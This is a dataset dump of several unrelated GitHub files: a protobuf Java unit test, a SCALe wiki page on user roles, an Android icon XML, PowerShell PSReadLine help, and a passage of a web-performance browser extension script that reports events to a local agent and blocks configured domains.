text
stringlengths 2
99.9k
| meta
dict |
---|---|
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc. All rights reserved.
// http://code.google.com/p/protobuf/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
package com.google.protobuf.test;
import com.google.protobuf.*;
import com.google.protobuf.Descriptors.FieldDescriptor;
import protobuf_unittest.UnittestOptimizeFor.TestOptimizedForSize;
import protobuf_unittest.UnittestProto;
import protobuf_unittest.UnittestProto.ForeignMessage;
import protobuf_unittest.UnittestProto.TestAllExtensions;
import protobuf_unittest.UnittestProto.TestAllTypes;
import protobuf_unittest.UnittestProto.TestPackedTypes;
import protobuf_unittest.UnittestProto.TestRequired;
import protobuf_unittest.UnittestProto.TestRequiredForeign;
import protobuf_unittest.UnittestProto.TestUnpackedTypes;
import junit.framework.TestCase;
import java.util.Map;
/**
* Unit test for {@link AbstractMessage}.
*
* @author [email protected] (Kenton Varda)
*/
public class AbstractMessageTest extends TestCase {
  /**
   * Extends AbstractMessage and wraps some other message object. The methods
   * of the Message interface which aren't explicitly implemented by
   * AbstractMessage are forwarded to the wrapped object. This allows us to
   * test that AbstractMessage's implementations work even if the wrapped
   * object does not use them.
   */
  private static class AbstractMessageWrapper extends AbstractMessage {
    // Concrete message that all reflection calls are forwarded to.
    private final Message wrappedMessage;
    public AbstractMessageWrapper(Message wrappedMessage) {
      this.wrappedMessage = wrappedMessage;
    }
    // --- Straight delegation of the reflection interface to the wrapped
    // message; AbstractMessage supplies everything else (serialization,
    // equals/hashCode, isInitialized, ...), which is what this test covers.
    public Descriptors.Descriptor getDescriptorForType() {
      return wrappedMessage.getDescriptorForType();
    }
    public AbstractMessageWrapper getDefaultInstanceForType() {
      return new AbstractMessageWrapper(
        wrappedMessage.getDefaultInstanceForType());
    }
    public Map<Descriptors.FieldDescriptor, Object> getAllFields() {
      return wrappedMessage.getAllFields();
    }
    public boolean hasField(Descriptors.FieldDescriptor field) {
      return wrappedMessage.hasField(field);
    }
    public Object getField(Descriptors.FieldDescriptor field) {
      return wrappedMessage.getField(field);
    }
    public int getRepeatedFieldCount(Descriptors.FieldDescriptor field) {
      return wrappedMessage.getRepeatedFieldCount(field);
    }
    public Object getRepeatedField(
        Descriptors.FieldDescriptor field, int index) {
      return wrappedMessage.getRepeatedField(field, index);
    }
    public UnknownFieldSet getUnknownFields() {
      return wrappedMessage.getUnknownFields();
    }
    public Builder newBuilderForType() {
      return new Builder(wrappedMessage.newBuilderForType());
    }
    public Builder toBuilder() {
      return new Builder(wrappedMessage.toBuilder());
    }
    /** Builder counterpart that forwards to a wrapped Message.Builder. */
    static class Builder extends AbstractMessage.Builder<Builder> {
      private final Message.Builder wrappedBuilder;
      public Builder(Message.Builder wrappedBuilder) {
        this.wrappedBuilder = wrappedBuilder;
      }
      public AbstractMessageWrapper build() {
        return new AbstractMessageWrapper(wrappedBuilder.build());
      }
      public AbstractMessageWrapper buildPartial() {
        return new AbstractMessageWrapper(wrappedBuilder.buildPartial());
      }
      public Builder clone() {
        return new Builder(wrappedBuilder.clone());
      }
      public boolean isInitialized() {
        // Routes through buildPartial() so that AbstractMessage's own
        // isInitialized() implementation (not the wrapped builder's) runs;
        // the wrapper message class above does not override it.
        return clone().buildPartial().isInitialized();
      }
      public Descriptors.Descriptor getDescriptorForType() {
        return wrappedBuilder.getDescriptorForType();
      }
      public AbstractMessageWrapper getDefaultInstanceForType() {
        return new AbstractMessageWrapper(
          wrappedBuilder.getDefaultInstanceForType());
      }
      public Map<Descriptors.FieldDescriptor, Object> getAllFields() {
        return wrappedBuilder.getAllFields();
      }
      public Builder newBuilderForField(Descriptors.FieldDescriptor field) {
        return new Builder(wrappedBuilder.newBuilderForField(field));
      }
      public boolean hasField(Descriptors.FieldDescriptor field) {
        return wrappedBuilder.hasField(field);
      }
      public Object getField(Descriptors.FieldDescriptor field) {
        return wrappedBuilder.getField(field);
      }
      public Builder setField(Descriptors.FieldDescriptor field, Object value) {
        wrappedBuilder.setField(field, value);
        return this;
      }
      public Builder clearField(Descriptors.FieldDescriptor field) {
        wrappedBuilder.clearField(field);
        return this;
      }
      public int getRepeatedFieldCount(Descriptors.FieldDescriptor field) {
        return wrappedBuilder.getRepeatedFieldCount(field);
      }
      public Object getRepeatedField(
          Descriptors.FieldDescriptor field, int index) {
        return wrappedBuilder.getRepeatedField(field, index);
      }
      public Builder setRepeatedField(Descriptors.FieldDescriptor field,
                                      int index, Object value) {
        wrappedBuilder.setRepeatedField(field, index, value);
        return this;
      }
      public Builder addRepeatedField(
          Descriptors.FieldDescriptor field, Object value) {
        wrappedBuilder.addRepeatedField(field, value);
        return this;
      }
      public UnknownFieldSet getUnknownFields() {
        return wrappedBuilder.getUnknownFields();
      }
      public Builder setUnknownFields(UnknownFieldSet unknownFields) {
        wrappedBuilder.setUnknownFields(unknownFields);
        return this;
      }
      @Override
      public Message.Builder getFieldBuilder(FieldDescriptor field) {
        return wrappedBuilder.getFieldBuilder(field);
      }
    }
    public Parser<? extends Message> getParserForType() {
      return wrappedMessage.getParserForType();
    }
  }
  // =================================================================
  // Reflection test helpers (not referenced by the tests visible below).
  TestUtil.ReflectionTester reflectionTester =
    new TestUtil.ReflectionTester(TestAllTypes.getDescriptor(), null);
  TestUtil.ReflectionTester extensionsReflectionTester =
    new TestUtil.ReflectionTester(TestAllExtensions.getDescriptor(),
      TestUtil.getExtensionRegistry());
  /** AbstractMessage.Builder.clear() must reset every field. */
  public void testClear() throws Exception {
    AbstractMessageWrapper message =
      new AbstractMessageWrapper.Builder(
        TestAllTypes.newBuilder(TestUtil.getAllSet()))
      .clear().build();
    TestUtil.assertClear((TestAllTypes) message.wrappedMessage);
  }
  /** mergeFrom(Message) into an empty builder must copy all fields. */
  public void testCopy() throws Exception {
    AbstractMessageWrapper message =
      new AbstractMessageWrapper.Builder(TestAllTypes.newBuilder())
      .mergeFrom(TestUtil.getAllSet()).build();
    TestUtil.assertAllFieldsSet((TestAllTypes) message.wrappedMessage);
  }
  /** AbstractMessage.getSerializedSize() must match the generated code's. */
  public void testSerializedSize() throws Exception {
    TestAllTypes message = TestUtil.getAllSet();
    Message abstractMessage = new AbstractMessageWrapper(TestUtil.getAllSet());
    assertEquals(message.getSerializedSize(),
                 abstractMessage.getSerializedSize());
  }
  /** AbstractMessage.toByteString() must produce the canonical wire bytes. */
  public void testSerialization() throws Exception {
    Message abstractMessage = new AbstractMessageWrapper(TestUtil.getAllSet());
    TestUtil.assertAllFieldsSet(
      TestAllTypes.parseFrom(abstractMessage.toByteString()));
    assertEquals(TestUtil.getAllSet().toByteString(),
                 abstractMessage.toByteString());
  }
  /** AbstractMessage.Builder.mergeFrom(ByteString) must parse all fields. */
  public void testParsing() throws Exception {
    AbstractMessageWrapper.Builder builder =
      new AbstractMessageWrapper.Builder(TestAllTypes.newBuilder());
    AbstractMessageWrapper message =
      builder.mergeFrom(TestUtil.getAllSet().toByteString()).build();
    TestUtil.assertAllFieldsSet((TestAllTypes) message.wrappedMessage);
  }
  /**
   * Parsing a message with missing required fields must succeed via
   * buildPartial() but throw UninitializedMessageException from build().
   */
  public void testParsingUninitialized() throws Exception {
    TestRequiredForeign.Builder builder = TestRequiredForeign.newBuilder();
    builder.getOptionalMessageBuilder().setDummy2(10);
    ByteString bytes = builder.buildPartial().toByteString();
    Message.Builder abstractMessageBuilder =
      new AbstractMessageWrapper.Builder(TestRequiredForeign.newBuilder());
    // mergeFrom() should not throw initialization error.
    abstractMessageBuilder.mergeFrom(bytes).buildPartial();
    try {
      abstractMessageBuilder.mergeFrom(bytes).build();
      fail();
    } catch (UninitializedMessageException ex) {
      // pass
    }
    // test DynamicMessage directly.
    Message.Builder dynamicMessageBuilder = DynamicMessage.newBuilder(
      TestRequiredForeign.getDescriptor());
    // mergeFrom() should not throw initialization error.
    dynamicMessageBuilder.mergeFrom(bytes).buildPartial();
    try {
      dynamicMessageBuilder.mergeFrom(bytes).build();
      fail();
    } catch (UninitializedMessageException ex) {
      // pass
    }
  }
  /** Packed repeated fields must serialize identically to generated code. */
  public void testPackedSerialization() throws Exception {
    Message abstractMessage =
      new AbstractMessageWrapper(TestUtil.getPackedSet());
    TestUtil.assertPackedFieldsSet(
      TestPackedTypes.parseFrom(abstractMessage.toByteString()));
    assertEquals(TestUtil.getPackedSet().toByteString(),
                 abstractMessage.toByteString());
  }
  public void testPackedParsing() throws Exception {
    AbstractMessageWrapper.Builder builder =
      new AbstractMessageWrapper.Builder(TestPackedTypes.newBuilder());
    AbstractMessageWrapper message =
      builder.mergeFrom(TestUtil.getPackedSet().toByteString()).build();
    TestUtil.assertPackedFieldsSet((TestPackedTypes) message.wrappedMessage);
  }
  public void testUnpackedSerialization() throws Exception {
    Message abstractMessage =
      new AbstractMessageWrapper(TestUtil.getUnpackedSet());
    TestUtil.assertUnpackedFieldsSet(
      TestUnpackedTypes.parseFrom(abstractMessage.toByteString()));
    assertEquals(TestUtil.getUnpackedSet().toByteString(),
                 abstractMessage.toByteString());
  }
  /** Parsers must accept packed data for fields declared unpacked... */
  public void testParsePackedToUnpacked() throws Exception {
    AbstractMessageWrapper.Builder builder =
      new AbstractMessageWrapper.Builder(TestUnpackedTypes.newBuilder());
    AbstractMessageWrapper message =
      builder.mergeFrom(TestUtil.getPackedSet().toByteString()).build();
    TestUtil.assertUnpackedFieldsSet(
      (TestUnpackedTypes) message.wrappedMessage);
  }
  /** ...and unpacked data for fields declared packed. */
  public void testParseUnpackedToPacked() throws Exception {
    AbstractMessageWrapper.Builder builder =
      new AbstractMessageWrapper.Builder(TestPackedTypes.newBuilder());
    AbstractMessageWrapper message =
      builder.mergeFrom(TestUtil.getUnpackedSet().toByteString()).build();
    TestUtil.assertPackedFieldsSet((TestPackedTypes) message.wrappedMessage);
  }
  public void testUnpackedParsing() throws Exception {
    AbstractMessageWrapper.Builder builder =
      new AbstractMessageWrapper.Builder(TestUnpackedTypes.newBuilder());
    AbstractMessageWrapper message =
      builder.mergeFrom(TestUtil.getUnpackedSet().toByteString()).build();
    TestUtil.assertUnpackedFieldsSet(
      (TestUnpackedTypes) message.wrappedMessage);
  }
  public void testOptimizedForSize() throws Exception {
    // We're mostly only checking that this class was compiled successfully.
    TestOptimizedForSize message =
      TestOptimizedForSize.newBuilder().setI(1).build();
    message = TestOptimizedForSize.parseFrom(message.toByteString());
    assertEquals(2, message.getSerializedSize());
  }
  // -----------------------------------------------------------------
  // Tests for isInitialized().
  private static final TestRequired TEST_REQUIRED_UNINITIALIZED =
    TestRequired.getDefaultInstance();
  private static final TestRequired TEST_REQUIRED_INITIALIZED =
    TestRequired.newBuilder().setA(1).setB(2).setC(3).build();
  /** Required fields must be reported one by one as they are filled in. */
  public void testIsInitialized() throws Exception {
    TestRequired.Builder builder = TestRequired.newBuilder();
    AbstractMessageWrapper.Builder abstractBuilder =
      new AbstractMessageWrapper.Builder(builder);
    assertFalse(abstractBuilder.isInitialized());
    assertEquals("a, b, c", abstractBuilder.getInitializationErrorString());
    builder.setA(1);
    assertFalse(abstractBuilder.isInitialized());
    assertEquals("b, c", abstractBuilder.getInitializationErrorString());
    builder.setB(1);
    assertFalse(abstractBuilder.isInitialized());
    assertEquals("c", abstractBuilder.getInitializationErrorString());
    builder.setC(1);
    assertTrue(abstractBuilder.isInitialized());
    assertEquals("", abstractBuilder.getInitializationErrorString());
  }
  /** isInitialized() must recurse into singular and repeated sub-messages. */
  public void testForeignIsInitialized() throws Exception {
    TestRequiredForeign.Builder builder = TestRequiredForeign.newBuilder();
    AbstractMessageWrapper.Builder abstractBuilder =
      new AbstractMessageWrapper.Builder(builder);
    assertTrue(abstractBuilder.isInitialized());
    assertEquals("", abstractBuilder.getInitializationErrorString());
    builder.setOptionalMessage(TEST_REQUIRED_UNINITIALIZED);
    assertFalse(abstractBuilder.isInitialized());
    assertEquals(
      "optional_message.a, optional_message.b, optional_message.c",
      abstractBuilder.getInitializationErrorString());
    builder.setOptionalMessage(TEST_REQUIRED_INITIALIZED);
    assertTrue(abstractBuilder.isInitialized());
    assertEquals("", abstractBuilder.getInitializationErrorString());
    builder.addRepeatedMessage(TEST_REQUIRED_UNINITIALIZED);
    assertFalse(abstractBuilder.isInitialized());
    assertEquals(
      "repeated_message[0].a, repeated_message[0].b, repeated_message[0].c",
      abstractBuilder.getInitializationErrorString());
    builder.setRepeatedMessage(0, TEST_REQUIRED_INITIALIZED);
    assertTrue(abstractBuilder.isInitialized());
    assertEquals("", abstractBuilder.getInitializationErrorString());
  }
  // -----------------------------------------------------------------
  // Tests for mergeFrom
  static final TestAllTypes MERGE_SOURCE =
    TestAllTypes.newBuilder()
      .setOptionalInt32(1)
      .setOptionalString("foo")
      .setOptionalForeignMessage(ForeignMessage.getDefaultInstance())
      .addRepeatedString("bar")
      .build();
  static final TestAllTypes MERGE_DEST =
    TestAllTypes.newBuilder()
      .setOptionalInt64(2)
      .setOptionalString("baz")
      .setOptionalForeignMessage(ForeignMessage.newBuilder().setC(3).build())
      .addRepeatedString("qux")
      .build();
  // Expected text format of merging SOURCE into DEST: scalars from SOURCE
  // win, sub-messages merge field-by-field, repeated fields concatenate.
  static final String MERGE_RESULT_TEXT =
    "optional_int32: 1\n" +
    "optional_int64: 2\n" +
    "optional_string: \"foo\"\n" +
    "optional_foreign_message {\n" +
    "  c: 3\n" +
    "}\n" +
    "repeated_string: \"qux\"\n" +
    "repeated_string: \"bar\"\n";
  public void testMergeFrom() throws Exception {
    AbstractMessageWrapper result =
      new AbstractMessageWrapper.Builder(
        TestAllTypes.newBuilder(MERGE_DEST))
      .mergeFrom(MERGE_SOURCE).build();
    assertEquals(MERGE_RESULT_TEXT, result.toString());
  }
  // -----------------------------------------------------------------
  // Tests for equals and hashCode
  public void testEqualsAndHashCode() throws Exception {
    TestAllTypes a = TestUtil.getAllSet();
    TestAllTypes b = TestAllTypes.newBuilder().build();
    TestAllTypes c = TestAllTypes.newBuilder(b).addRepeatedString("x").build();
    TestAllTypes d = TestAllTypes.newBuilder(c).addRepeatedString("y").build();
    TestAllExtensions e = TestUtil.getAllExtensionsSet();
    TestAllExtensions f = TestAllExtensions.newBuilder(e)
      .addExtension(UnittestProto.repeatedInt32Extension, 999).build();
    checkEqualsIsConsistent(a);
    checkEqualsIsConsistent(b);
    checkEqualsIsConsistent(c);
    checkEqualsIsConsistent(d);
    checkEqualsIsConsistent(e);
    checkEqualsIsConsistent(f);
    // Every pair of distinct messages must compare unequal, both ways.
    checkNotEqual(a, b);
    checkNotEqual(a, c);
    checkNotEqual(a, d);
    checkNotEqual(a, e);
    checkNotEqual(a, f);
    checkNotEqual(b, c);
    checkNotEqual(b, d);
    checkNotEqual(b, e);
    checkNotEqual(b, f);
    checkNotEqual(c, d);
    checkNotEqual(c, e);
    checkNotEqual(c, f);
    checkNotEqual(d, e);
    checkNotEqual(d, f);
    checkNotEqual(e, f);
    // Deserializing into the TestEmptyMessage such that every field
    // is an {@link UnknownFieldSet.Field}.
    UnittestProto.TestEmptyMessage eUnknownFields =
      UnittestProto.TestEmptyMessage.parseFrom(e.toByteArray());
    UnittestProto.TestEmptyMessage fUnknownFields =
      UnittestProto.TestEmptyMessage.parseFrom(f.toByteArray());
    checkNotEqual(eUnknownFields, fUnknownFields);
    checkEqualsIsConsistent(eUnknownFields);
    checkEqualsIsConsistent(fUnknownFields);
    // Subsequent reconstitutions should be identical
    UnittestProto.TestEmptyMessage eUnknownFields2 =
      UnittestProto.TestEmptyMessage.parseFrom(e.toByteArray());
    checkEqualsIsConsistent(eUnknownFields, eUnknownFields2);
  }
  /**
   * Asserts that the given proto has symmetric equals and hashCode methods.
   */
  private void checkEqualsIsConsistent(Message message) {
    // Object should be equal to itself.
    assertEquals(message, message);
    // Object should be equal to a dynamic copy of itself.
    DynamicMessage dynamic = DynamicMessage.newBuilder(message).build();
    checkEqualsIsConsistent(message, dynamic);
  }
  /**
   * Asserts that the given protos are equal and have the same hash code.
   */
  private void checkEqualsIsConsistent(Message message1, Message message2) {
    assertEquals(message1, message2);
    assertEquals(message2, message1);
    assertEquals(message2.hashCode(), message1.hashCode());
  }
  /**
   * Asserts that the given protos are not equal and have different hash codes.
   *
   * @warning It's valid for non-equal objects to have the same hash code, so
   * this test is stricter than it needs to be. However, this should happen
   * relatively rarely.
   */
  private void checkNotEqual(Message m1, Message m2) {
    String equalsError = String.format("%s should not be equal to %s", m1, m2);
    assertFalse(equalsError, m1.equals(m2));
    assertFalse(equalsError, m2.equals(m1));
    assertFalse(
      String.format("%s should have a different hash code from %s", m1, m2),
      m1.hashCode() == m2.hashCode());
  }
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<title>SCALe2 : User Roles</title>
<link rel="stylesheet" href="styles/site.css" type="text/css" />
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body class="theme-default aui-theme-default">
<div id="page">
<div id="main" class="aui-page-panel">
<div id="main-header">
<div id="breadcrumb-section">
<ol id="breadcrumbs">
<li class="first">
<span><a href="index.html">SCALe2</a></span>
</li>
<li>
<span><a href="SCALe2-Home_215846573.html">SCALe2 Home</a></span>
</li>
<li>
<span><a href="215846575.html">Source Code Analysis Lab (SCALe)</a></span>
</li>
</ol>
</div>
<h1 id="title-heading" class="pagetitle">
<span id="title-text">
SCALe2 : User Roles
</span>
</h1>
</div>
<div id="content" class="view">
<div class="page-metadata">
Created by <span class='author'> Wiki Administrator</span> on Dec 04, 2017
</div>
<div id="main-content" class="wiki-content group">
<p>The SCALe process involves developers, analysts, auditors, and administrators. The number of people performing each role is variable. For example, the SCALe process can be done by a single person performing all roles or by a large organization with teams of people for each role.</p><h3 id="UserRoles-Developers">Developers</h3><p>Developers are responsible for fixing any <a href="Terms-and-Definitions_215846944.html#TermsandDefinitions-vulnerability">vulnerabilities</a> found in the software, and they serve as the foremost authorities on the software's <a href="Terms-and-Definitions_215846944.html#TermsandDefinitions-implementation">implementation</a>. They also are responsible for providing the source code (to be analyzed) to the SCALe app.</p><h3 id="UserRoles-Analysts">Analysts</h3><p>Analysts are responsible for running appropriate <a href="Terms-and-Definitions_215846944.html#TermsandDefinitions-staticanalysis">static analysis</a> tools on the software. They may rely on the developers for wisdom about properly building the software. Analysts are responsible for providing tool output to the SCALe<strong> <span style="color: rgb(255,0,0);"> </span> </strong>app.</p><h3 id="UserRoles-Auditors">Auditors</h3><p>Auditors evaluate diagnostics, deciding which are confirmed violations and which are false positives. In this role, they are the primary users of the SCALe app. To correctly evaluate diagnostics, auditors must be familiar with the SEI CERT Coding Standards. 
These are available on the <a class="unresolved" href="#">web</a>, and the <img class="emoticon emoticon-light-on" src="images/icons/emoticons/lightbulb_on.png" data-emoticon-name="light-on" alt="(lightbulb)"/> <span style="color: rgb(0,128,0);"> <a href="http://www.cert.org/secure-coding/publications/books/cert-c-coding-standard-second-edition.cfm" class="external-link" rel="nofollow"> <span style="color: rgb(0,128,0);">C</span> </a> </span> and <img class="emoticon emoticon-light-on" src="images/icons/emoticons/lightbulb_on.png" data-emoticon-name="light-on" alt="(lightbulb)"/> <span style="color: rgb(0,128,0);"> <a href="http://www.cert.org/secure-coding/publications/books/cert-oracle-secure-coding-standard-for-java.cfm" class="external-link" rel="nofollow"> <span style="color: rgb(0,128,0);">Java</span> </a> </span> standards have been published by Addison-Wesley. CERT also offers courses in <img class="emoticon emoticon-light-on" src="images/icons/emoticons/lightbulb_on.png" data-emoticon-name="light-on" alt="(lightbulb)"/> <a href="http://www.sei.cmu.edu/training/P63.cfm" class="external-link" rel="nofollow"> <span style="color: rgb(0,128,0);">C and C++</span> </a> and Java for secure coding.</p><h3 id="UserRoles-Administrator">Administrator</h3><p>The administrator is responsible for installing and maintaining the SCALe app as well as any tools required by the analysts. 
The host running the SCALe app need not be directly accessed by anyone except the administrator.</p><p> </p><hr/><p><a href="System-Requirements_215846591.html"><span class="confluence-embedded-file-wrapper"><img class="confluence-embedded-image" src="attachments/216826567/216826568.png" data-image-src="https://wiki-int.sei.cmu.edu/confluence/download/attachments/216826567/button_arrow_left.png?version=1&modificationDate=1513017863440&api=v2" data-unresolved-comment-count="0" data-linked-resource-id="216826568" data-linked-resource-version="1" data-linked-resource-type="attachment" data-linked-resource-default-alias="button_arrow_left.png" data-base-url="https://wiki-int.sei.cmu.edu/confluence" data-linked-resource-content-type="image/png" data-linked-resource-container-id="216826567" data-linked-resource-container-version="3"></span></a> <a href="215846575.html"><span class="confluence-embedded-file-wrapper"><img class="confluence-embedded-image" src="attachments/216826567/216826570.png" data-image-src="https://wiki-int.sei.cmu.edu/confluence/download/attachments/216826567/button_arrow_up.png?version=1&modificationDate=1513017872173&api=v2" data-unresolved-comment-count="0" data-linked-resource-id="216826570" data-linked-resource-version="1" data-linked-resource-type="attachment" data-linked-resource-default-alias="button_arrow_up.png" data-base-url="https://wiki-int.sei.cmu.edu/confluence" data-linked-resource-content-type="image/png" data-linked-resource-container-id="216826567" data-linked-resource-container-version="3"></span></a> <a href="Installing-SCALe_215846594.html"><span class="confluence-embedded-file-wrapper"><img class="confluence-embedded-image" src="attachments/216826567/216826569.png" data-image-src="https://wiki-int.sei.cmu.edu/confluence/download/attachments/216826567/button_arrow_right.png?version=1&modificationDate=1513017872170&api=v2" data-unresolved-comment-count="0" data-linked-resource-id="216826569" data-linked-resource-version="1" 
data-linked-resource-type="attachment" data-linked-resource-default-alias="button_arrow_right.png" data-base-url="https://wiki-int.sei.cmu.edu/confluence" data-linked-resource-content-type="image/png" data-linked-resource-container-id="216826567" data-linked-resource-container-version="3"></span></a></p><p> </p>
</div>
</div> </div>
<div id="footer" role="contentinfo">
<section class="footer-body">
<p>Document generated by Confluence on Aug 14, 2018 13:43</p>
<div id="footer-logo"><a href="http://www.atlassian.com/">Atlassian</a></div>
</section>
</div>
</div> </body>
</html>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<adaptive-icon xmlns:android="http://schemas.android.com/apk/res/android">
<background android:drawable="@drawable/ic_launcher_background" />
<foreground android:drawable="@drawable/ic_launcher_foreground" />
</adaptive-icon> | {
"pile_set_name": "Github"
} |
---
external help file: Microsoft.PowerShell.PSReadLine2.dll-Help.xml
keywords: powershell,cmdlet
Locale: en-US
Module Name: PSReadLine
ms.date: 12/07/2018
online version: https://docs.microsoft.com/powershell/module/psreadline/remove-psreadlinekeyhandler?view=powershell-6&WT.mc_id=ps-gethelp
schema: 2.0.0
title: Remove-PSReadLineKeyHandler
---
# Remove-PSReadLineKeyHandler
## SYNOPSIS
Removes a key binding.
## SYNTAX
```
Remove-PSReadLineKeyHandler [-Chord] <String[]> [-ViMode <ViMode>] [<CommonParameters>]
```
## DESCRIPTION
The `Remove-PSReadLineKeyHandler` cmdlet removes a specified key binding.
## EXAMPLES
### Example 1: Remove a binding
```powershell
Remove-PSReadLineKeyHandler -Chord Ctrl+B
```
This command removes the binding from the key combination, or chord, `Ctrl+B`. The `Ctrl+B` chord is
created in the `Set-PSReadLineKeyHandler` article.
## PARAMETERS
### -Chord
Specifies an array of keys or sequences of keys to be removed. A single binding is specified by
using a single string. If the binding is a sequence of keys, separate the keys by a comma, as in
the following example:
`Ctrl+x,Ctrl+l`
This parameter accepts an array of strings. Each string is a separate binding, not a sequence of
keys for a single binding.
```yaml
Type: System.String[]
Parameter Sets: (All)
Aliases: Key
Required: True
Position: 0
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -ViMode
Specifies which vi mode the binding applies to. Possible values are: Insert, Command.
```yaml
Type: Microsoft.PowerShell.ViMode
Parameter Sets: (All)
Aliases:
Accepted values: Insert, Command
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### CommonParameters
This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable,
-InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose,
-WarningAction, and -WarningVariable. For more information, see
[about_CommonParameters](http://go.microsoft.com/fwlink/?LinkID=113216).
## INPUTS
### None
You cannot pipe objects to this cmdlet.
## OUTPUTS
### None
## NOTES
## RELATED LINKS
[Get-PSReadLineKeyHandler](Get-PSReadLineKeyHandler.md)
[Get-PSReadLineOption](Get-PSReadLineOption.md)
[Set-PSReadLineOption](Set-PSReadLineOption.md)
[Set-PSReadLineKeyHandler](Set-PSReadLineKeyHandler.md)
| {
"pile_set_name": "Github"
} |
// Base URL of the local wptagent server that receives events from this
// extension.
var SERVER = "http://127.0.0.1:8888/";
// Newline-delimited JSON event messages buffered for the next batched POST.
var messages = '';
// Pending setTimeout handle for the next flush (undefined when none queued).
var message_timer = undefined;
// performance.now() timestamp of the last flush; used to rate-limit posts.
var last_send = undefined;
// True once the blocking webRequest handlers have been installed.
var blockingWebRequest = false;
// URL substrings to block.
var block = [];
// Exact domains to block.
var block_domains = [];
// Allow-list of domains; when non-empty, every other domain is blocked.
var block_domains_except = [];
// Extra request headers to inject (header name -> value).
var headers = {};
// Host overrides (original hostname -> replacement hostname).
var overrideHosts = {};
// Flush the buffered event messages to the wptagent server in a single
// fire-and-forget POST and reset the batching state.
var send_messages = function() {
  message_timer = undefined;
  last_send = performance.now();
  // Declared with 'var': the original leaked message_headers as an
  // implicit global.
  var message_headers = new Headers({
    "Content-Type": "application/json",
    "Content-Length": messages.length.toString()
  });
  fetch(SERVER + 'messages',
        {method: 'POST', headers: message_headers, body: messages});
  messages = '';
};
// Queue an event message (path + optional body) for delivery, batching
// rapid events so the agent is POSTed to at most roughly every 500ms.
var send_message = function(event, body = undefined) {
  // 'var' added to message/elapsed/delay: the originals were implicit
  // globals, which would corrupt state across overlapping calls.
  var message = {path: event};
  if (body !== undefined)
    message['body'] = body;
  messages += JSON.stringify(message) + "\n";
  if (message_timer == undefined) {
    var elapsed = 1000;
    if (last_send !== undefined)
      elapsed = performance.now() - last_send;
    if (elapsed > 500) {
      // Last flush was long enough ago - send immediately.
      send_messages();
    } else {
      // Otherwise schedule a flush for the remainder of the 500ms window.
      var delay = Math.max(1, Math.min(500 - elapsed, 500));
      message_timer = setTimeout(send_messages, delay);
    }
  }
};
// Relay long-task notifications from the content script to wptagent,
// stamped with the background page's current time.
browser.runtime.onMessage.addListener(function(data) {
  if (data.msg == 'longTask')
    send_message('wptagent.longTask', {dur: data.dur, ts: performance.now()});
});
// POST a single log string to the wptagent server (fire-and-forget).
var log = function(message) {
  // Declared with 'var': the original leaked message_headers as an
  // implicit global.
  var message_headers = new Headers({
    "Content-Type": "application/json",
    "Content-Length": message.length.toString()
  });
  fetch(SERVER + 'log',
        {method: 'POST', headers: message_headers, body: message});
};
// Extract the bare hostname from a URL string: strips any scheme, path,
// port and query-string remnants.
function get_domain(url) {
  var hostPart = url.indexOf("://") > -1 ? url.split('/')[2]
                                         : url.split('/')[0];
  return hostPart.split(':')[0].split('?')[0];
}
// Blocking webRequest.onBeforeRequest handler. Decides whether a request
// should be cancelled according to the three configured rule sets; requests
// to the wptagent server itself are never blocked.
function blockRequest(details) {
  if (details.url.startsWith(SERVER))
    return {cancel: false};
  var domain = get_domain(details.url);
  // URL-substring block list.
  var cancel = block.some(function(fragment) {
    return details.url.indexOf(fragment) !== -1;
  });
  // Exact-domain block list.
  if (!cancel && block_domains.length > 0) {
    cancel = block_domains.some(function(blocked) {
      return domain == blocked;
    });
  }
  // Allow-list mode: block every domain not explicitly permitted.
  if (!cancel && block_domains_except.length > 0)
    cancel = !block_domains_except.includes(domain);
  return {cancel: cancel};
}
// Blocking webRequest.onBeforeSendHeaders handler. Injects the configured
// extra headers and applies host overrides (rewriting the Host header and
// recording the original hostname in x-Host) on all non-agent requests.
function addHeaders(details) {
  if (!details.url.startsWith(SERVER)) {
    // 'var' added to both for-in loops: the originals leaked 'name' and
    // 'host' as implicit globals (and assigning to the global 'name'
    // clobbers window.name in a page context).
    for (var name in headers) {
      // Replace any existing header of the same name with ours.
      for (var i = 0; i < details.requestHeaders.length; ++i) {
        if (details.requestHeaders[i].name === name) {
          details.requestHeaders.splice(i, 1);
          break;
        }
      }
      details.requestHeaders.push({'name': name, 'value': headers[name]})
    }
    var url = new URL(details.url);
    for (var host in overrideHosts) {
      if (host == url.hostname) {
        for (var i = 0; i < details.requestHeaders.length; ++i) {
          if (details.requestHeaders[i].name === 'Host') {
